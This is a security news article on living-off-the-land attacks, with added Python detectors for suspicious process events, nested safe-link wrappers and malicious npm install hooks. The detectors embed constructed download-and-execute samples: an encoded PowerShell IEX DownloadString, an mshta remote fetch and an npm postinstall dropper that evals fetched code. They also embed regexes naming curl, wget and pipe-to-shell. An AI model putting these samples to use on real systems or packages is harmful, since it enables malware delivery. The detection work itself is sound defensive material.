Cybercriminals Exploit Trusted Tools to Deploy Notorious Malware
In recent years, cybercriminals have increasingly turned to exploiting legitimate system utilities and trusted tools to conduct their malicious activities. This strategy, known as living off the land, allows attackers to blend their operations with normal system processes, making detection significantly more challenging.
The Rise of Living-Off-the-Land Attacks
The living off the land approach uses tools already present on a target’s system, such as PowerShell, Windows Script Host, or JavaScript environments, rather than deploying external malware. Because no new binary needs to be written to disk, file-based signature detection has little to match on; the activity shows up instead in process lineage and command lines (a mail client spawning wscript.exe, or an encoded PowerShell command line), which is where defenders have to look.
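The following is an added example, not code from the article or from any vendor, of the process-lineage and command-line triage that paragraph describes. It scores constructed Sysmon-style process-creation events against a few LOTL indicators (script host launched by a mail client, script run from a user-writable path, hidden or encoded PowerShell, mshta fetching remote content) and decodes the -EncodedCommand payload so the analyst can see what was hidden. All events, paths and hostnames are constructed samples.

```python
"""Heuristic triage of process-creation events for living-off-the-land abuse.

Added example, not the article's or any vendor's code. Each event is scored by
the LOTL indicators visible in its parent, image and command line, and the
PowerShell -EncodedCommand payload is decoded. Events are constructed samples
in Sysmon Event ID 1 style, not real telemetry.
"""
import base64
import ntpath
import re

# Binaries that execute scripts or remote content and are routinely abused.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Parents that should almost never launch a script host directly.
MAIL_OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|AppData\\Local|AppData\\Roaming)\\", re.I)
# PowerShell accepts unique prefixes of -EncodedCommand (-e, -ec, -enc ...).
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_FLAG = re.compile(r"-e(?:p|x(?:ecutionpolicy)?)\s+bypass", re.I)
REMOTE_EVAL = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                         r"\biex\b|invoke-expression|frombase64string", re.I)
REMOTE_CONTENT = re.compile(r"https?://|javascript:|vbscript:|scrobj\.dll", re.I)

# Constructed payload: what an attacker would hide behind -EncodedCommand.
HIDDEN_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"
ENC = base64.b64encode(HIDDEN_SCRIPT.encode("utf-16le")).decode("ascii")

EVENTS = [  # constructed samples
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    # Mail client launching a script from Temp: the invoice-lure pattern.
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\Invoice_4471.vbs"'},
    # Script host chaining into hidden, encoded PowerShell.
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENC},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/p.hta"},
    # Scheduled-task style admin script: a weak signal on its own.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\backup.ps1"},
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Return the LOTL indicators matched by one event (empty list if none)."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmd = event["cmdline"]
    reasons = []
    if image not in SCRIPT_HOSTS:
        return reasons
    if parent in MAIL_OFFICE_PARENTS:
        reasons.append(f"{image} spawned by mail/Office client {parent}")
    if image in ("wscript.exe", "cscript.exe") and USER_WRITABLE.search(cmd):
        reasons.append("script run from a user-writable path")
    if image in ("powershell.exe", "pwsh.exe"):
        if HIDDEN_FLAG.search(cmd):
            reasons.append("hidden window requested")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command present: " + decoded[:60])
            if REMOTE_EVAL.search(decoded):
                reasons.append("decoded command fetches or evaluates remote content")
        elif REMOTE_EVAL.search(cmd):
            reasons.append("command fetches or evaluates remote content")
        if BYPASS_FLAG.search(cmd):
            # Common in legitimate admin scripts; meaningful only alongside other hits.
            reasons.append("execution policy bypass (low confidence)")
    if image in ("mshta.exe", "rundll32.exe", "regsvr32.exe") and REMOTE_CONTENT.search(cmd):
        reasons.append(f"{image} given remote or inline script content")
    return reasons


def triage_all(events):
    """Return [(image, reasons)] for every event with at least one indicator."""
    hits = []
    for ev in events:
        reasons = triage(ev)
        if reasons:
            hits.append((ntpath.basename(ev["image"]).lower(), reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in triage_all(EVENTS):
        print(f"{image} (score {len(reasons)})")
        for r in reasons:
            print("   -", r)
```

The scheduled backup script is reported with a single low-confidence reason, which is the point: an execution-policy bypass or a script host by itself is normal in most estates, and the value comes from combining parent process, path and decoded command line before alerting.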
According to ANY.RUN’s Q1 2026 Cyber Risk Report, which analyzed over 2.1 million malware and phishing investigations, there has been a significant increase in such attacks. Credential theft rose by 14.7%, loader-based attacks spiked by 98.3%, and Living-off-the-Land Binary and Script (LOLBAS) attacks leveraging JavaScript surged by 58.4%. These statistics highlight a shift towards more covert and rapid attack methodologies.
Exploitation of Remote Monitoring and Management (RMM) Tools
Remote Monitoring and Management (RMM) tools, built so IT administrators can maintain and support systems remotely, have become a favourite vehicle for abuse. Rather than writing their own remote-access malware, attackers install or hijack these signed, widely allowlisted agents to get into networks, keep access, and move laterally between systems.
Commonly abused RMM applications include AnyDesk, TeamViewer, ScreenConnect, Quick Assist, and Splashtop (Quick Assist is Windows’ built-in remote-help feature rather than a third-party RMM product, but it is misused the same way). These tools are widely deployed across organizations for legitimate purposes, so malicious sessions are hard to tell apart from support work. Intel471 analysts have found that attackers often gain initial access to RMM software by compromising user credentials through social engineering or by exploiting vulnerabilities in outdated versions.
Weaponization of URL Rewriting Mechanisms
Phishing attackers have found ways to turn standard security features against the very users they were built to protect. By abusing URL rewriting—a defensive mechanism embedded in most enterprise email gateways—threat actors are weaponizing trusted safe links to carry malicious payloads past detection filters.
URL rewriting works by intercepting links in incoming email and replacing them with vendor-generated URLs, so that a click is routed through the vendor’s scanning servers before the user reaches the destination. Attackers abuse this by sending their link through an account in a tenant where rewriting is switched on: the gateway dutifully wraps the malicious URL in a link on the vendor’s own domain, and the attacker then harvests that pre-wrapped “safe” link and reuses it across broad phishing campaigns, where both recipients and downstream filters see a trusted vendor domain rather than the real destination.
LevelBlue analysts identified a significant escalation in this tactic between the second and fourth quarters of 2025, noting that adversaries had moved from single-layer abuse to building multi-layered URL rewriting chains across several trusted vendor domains. The goal was to stack redirect hops deep enough that no automated scanner could trace the link back to its true destination.
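To make the wrapping and the multi-layer chains concrete, here is an added example, not the article’s or any vendor’s code, that peels nested rewriter wrappers until it reaches a host it does not recognise, bounds the number of hops it will follow, and flags links that are wrapped more than once or by a gateway the organisation does not operate. It assumes the common rewriter shape in which the destination travels in a query parameter: safelinks.protection.outlook.com with url= is Microsoft’s real format; the second host and its u= parameter are hypothetical stand-ins for another vendor, and every link is constructed.

```python
"""Peel nested URL-rewriting wrappers to recover a link's true destination.

Added example, not the article's or any vendor's code. It assumes the
destination travels in a query parameter: safelinks.protection.outlook.com
with `url=` is Microsoft's real format; scan.example-gateway.invalid with
`u=` is a hypothetical stand-in for another vendor. All links are constructed.
"""
from urllib.parse import parse_qs, quote, urlparse

# Rewriter host suffix -> query parameter that carries the wrapped destination.
REWRITERS = {
    "safelinks.protection.outlook.com": "url",
    "scan.example-gateway.invalid": "u",   # hypothetical second vendor
}


def rewriter_param(host):
    """Return the payload parameter if host is (a subdomain of) a known rewriter."""
    for suffix, param in REWRITERS.items():
        if host == suffix or host.endswith("." + suffix):
            return param
    return None


def unwrap(link, max_hops=10):
    """Return (destination, hops_peeled, wrapper_hosts).

    max_hops bounds the work so an attacker-built deep chain cannot spin the
    resolver; when hops_peeled == max_hops the destination is still wrapped
    and the link must be treated as unresolved, not as safe.
    """
    chain, current = [], link
    for hop in range(max_hops):
        parsed = urlparse(current)
        host = parsed.netloc.lower()
        param = rewriter_param(host)
        if param is None:
            return current, hop, chain
        inner = parse_qs(parsed.query).get(param)
        if not inner:
            return current, hop, chain   # wrapper with no payload: stop here
        chain.append(host)
        current = inner[0]               # parse_qs already percent-decoded it
    return current, max_hops, chain


def assess(link, own_rewriters=(), max_hops=10):
    """Flag links whose wrapping could not have come from our own gateway.

    own_rewriters: host suffixes that OUR gateway emits. Inbound mail should
    not normally carry links pre-wrapped by another tenant's gateway, and a
    chain of two or more wrappers is itself a tell.
    """
    dest, hops, chain = unwrap(link, max_hops)
    flags = []
    if hops >= 2:
        flags.append("multi-layer wrapping")
    if any(not any(h == s or h.endswith("." + s) for s in own_rewriters) for h in chain):
        flags.append("wrapped by a gateway we do not operate")
    if hops >= max_hops and rewriter_param(urlparse(dest).netloc.lower()):
        flags.append("unresolved after max hops")
    return {"destination": dest, "hops": hops, "chain": chain, "flags": flags}


def wrap(host, param, destination):
    """Construct a rewritten link the way a gateway would (sample input only)."""
    return f"https://{host}/?{param}={quote(destination, safe='')}"


PHISH = "https://login-verify.example.invalid/auth"   # constructed
# Two tenants' gateways wrapped the same link in turn.
SAMPLE = wrap("nam02.safelinks.protection.outlook.com", "url",
              wrap("scan.example-gateway.invalid", "u", PHISH))

if __name__ == "__main__":
    print(assess(SAMPLE, own_rewriters=("safelinks.protection.outlook.com",)))
```

Two caveats when using this for real: some vendors serve every tenant from a shared host, so a domain match alone does not prove the wrapper was produced by your own gateway, and legitimately forwarded mail does carry another organisation’s rewritten links. The stronger signals are the depth of the chain and a resolver that refuses to call a link clean when it ran out of hops before reaching a non-wrapper host.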
Abuse of Node.js for Malware Delivery
Attackers are increasingly exploiting Node.js, a widely trusted, open-source JavaScript runtime, to deliver sophisticated malware, steal sensitive data, and compromise entire systems. Recent campaigns observed since late 2024 have showcased a shift in attacker tactics. They leverage Node.js both for direct script execution and as a vehicle for compiled malware, often bypassing traditional security controls.
Thanks to its cross-platform support and large ecosystem, Node.js is popular among developers for building server-side applications and front-end tooling. Threat actors now weaponize those same strengths. Embedding malicious code in Node.js executables or npm (Node Package Manager) packages lets attackers blend their malware with legitimate applications, evade detection, and persist in target environments; because npm runs a package’s lifecycle scripts automatically at install time, a single malicious dependency can execute before any of the project’s own code is ever imported.
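The install-time angle is the part worth seeing in code. Below is an added example, not the article’s or npm’s code, that reads a package.json, lists every lifecycle hook npm would run on install, and scores each command against a few indicators (inline node -e code, network fetches, eval, pipe-to-shell, base64). Both manifests are constructed and the hostname is a placeholder.

```python
"""Inspect an npm package manifest for code that runs at install time.

Added example, not the article's or npm's code. npm executes a package's
lifecycle scripts (preinstall, install, postinstall, prepare ...) during
`npm install` without anyone importing the package. Both manifests below are
constructed; the hostname is a placeholder.
"""
import json
import re

# Hooks that run without any explicit action by the developer.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                 "preuninstall", "postuninstall")

INDICATORS = {
    "inline-code":   re.compile(r"\bnode\s+(?:-e|--eval)\b|\bpowershell\b", re.I),
    "network-fetch": re.compile(r"\bcurl\b|\bwget\b|https?://|Invoke-WebRequest|"
                                r"require\(['\"]https?['\"]\)", re.I),
    "pipe-to-shell": re.compile(r"\|\s*(?:sh|bash)\b"),
    "dynamic-eval":  re.compile(r"\beval\s*\(|new\s+Function\s*\(", re.I),
    "base64":        re.compile(r"base64|atob\s*\(", re.I),
}


def inspect_manifest(manifest_text):
    """Return one finding per install-time hook: hook, command, matched indicators."""
    scripts = json.loads(manifest_text).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        matched = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
        findings.append({"hook": hook, "command": cmd, "indicators": matched})
    return findings


def risk(findings):
    """'high' if any hook shows two or more indicators; 'review' if any install
    hook exists at all (native addons legitimately build in install); else 'none'."""
    if any(len(f["indicators"]) >= 2 for f in findings):
        return "high"
    return "review" if findings else "none"


# Constructed: a native addon that compiles itself on install, nothing more.
BENIGN = json.dumps({
    "name": "native-addon", "version": "1.0.0",
    "scripts": {"install": "node-gyp rebuild", "test": "mocha"},
})

# Constructed dropper: fetches a script over HTTPS at install time and evals it.
MALICIOUS = json.dumps({
    "name": "colors-utils", "version": "1.0.3",
    "scripts": {
        "postinstall": "node -e \"require('https').get('https://cdn.example.invalid/i.js',"
                       "r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
    },
})

if __name__ == "__main__":
    for text in (BENIGN, MALICIOUS):
        findings = inspect_manifest(text)
        print(json.loads(text)["name"], "->", risk(findings), findings)
```

The regexes are deliberately simple and an obfuscated script will slip past them; the durable control is to read every install hook in a new dependency and to run `npm install --ignore-scripts` (or set `ignore-scripts=true` in npm config) in CI, enabling scripts only for packages that genuinely need a build step.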
Malicious Use of 7-Zip Installers
A deceptive campaign targeting unsuspecting users has emerged, using a counterfeit build of the widely used 7-Zip file archiver to silently turn home computers into residential proxy nodes. The operation relies on a lookalike domain, 7zip[.]com, which mimics the legitimate 7-zip.org site and tricks users into downloading a trojanized installer that appears fully functional while concealing the malware components.
The threat came to public attention after a Reddit user shared their troubling experience in the r/pcmasterrace community. While following a YouTube tutorial for building a new PC, they were directed to download 7-Zip from the fraudulent domain. After installing the software on both a laptop and a newly assembled desktop via USB transfer, the user encountered persistent compatibility errors but continued using the system.
Nearly two weeks passed before Microsoft Defender flagged the infection with a generic trojan detection, revealing the hidden compromise.
Leveraging Velociraptor for Stealthy Command and Control
Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity. A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.
By deploying this software, adversaries establish stealthy Command and Control (C2) channels through which they execute arbitrary commands and keep persistent access to compromised environments without triggering traditional security alarms. Because the binary is a legitimate, signed DFIR tool, its presence is suspicious only in context: organizations should inventory their own authorized Velociraptor deployments and alert on any agent or server component that appears outside that inventory.
The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint. Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.
Weaponization of Invoices to Deliver XWorm
Attackers are using fake invoice emails to spread XWorm, a remote-access trojan that quietly steals credentials and sensitive files from infected computers. When a user opens the attached VBScript (.vbs) file, the malware starts working silently in the background with no visible warning or alert, so victims typically do not learn their system is compromised until the damage is done.
Once active, XWorm gives attackers complete control over the infected machine, allowing them to record keystrokes, spy on users, steal personal data, and even install additional threats such as ransomware.
Category: Security News